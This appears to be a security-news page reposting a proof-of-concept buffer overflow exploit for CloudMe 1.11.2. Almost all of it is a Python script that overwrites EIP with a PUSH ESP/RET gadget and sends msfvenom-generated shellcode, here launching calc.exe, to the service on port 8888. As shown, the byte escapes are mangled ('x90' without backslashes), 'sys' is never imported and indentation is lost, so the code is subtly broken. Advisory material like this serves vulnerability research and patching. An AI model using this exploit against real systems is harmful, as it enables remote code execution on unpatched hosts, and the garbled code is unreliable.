Exploit/Advisories

Published on April 28th, 2020 📆 | 5183 Views ⚑

0

CloudMe 1.11.2 Buffer Overflow ↭


TTS

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1 = b"x90" * 1052
EIP = b"xB5x42xA8x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"x90" * 30





#msfvenom -a x86 -p windows/exec CMD=calc.exe -b 'x00x0Ax0D' -f python
payload = b"xbaxadx1ex7cx02xdbxcfxd9x74x24xf4x5ex33"
payload += b"xc9xb1x31x83xc6x04x31x56x0fx03x56xa2xfc"
payload += b"x89xfex54x82x72xffxa4xe3xfbx1ax95x23x9f"
payload += b"x6fx85x93xebx22x29x5fxb9xd6xbax2dx16xd8"
payload += b"x0bx9bx40xd7x8cxb0xb1x76x0excbxe5x58x2f"
payload += b"x04xf8x99x68x79xf1xc8x21xf5xa4xfcx46x43"
payload += b"x75x76x14x45xfdx6bxecx64x2cx3ax67x3fxee"
payload += b"xbcxa4x4bxa7xa6xa9x76x71x5cx19x0cx80xb4"
payload += b"x50xedx2fxf9x5dx1cx31x3dx59xffx44x37x9a"
payload += b"x82x5ex8cxe1x58xeax17x41x2ax4cxfcx70xff"
payload += b"x0bx77x7exb4x58xdfx62x4bx8cx6bx9exc0x33"
payload += b"xbcx17x92x17x18x7cx40x39x39xd8x27x46x59"
payload += b"x83x98xe2x11x29xccx9ex7bx27x13x2cx06x05"
payload += b"x13x2ex09x39x7cx1fx82xd6xfbxa0x41x93xf4"
payload += b"xeaxc8xb5x9cxb2x98x84xc0x44x77xcaxfcxc6"
payload += b"x72xb2xfaxd7xf6xb7x47x50xeaxc5xd8x35x0c"
payload += b"x7axd8x1fx6fx1dx4axc3x5exb8xeax66x9f"

overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)

Source link

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑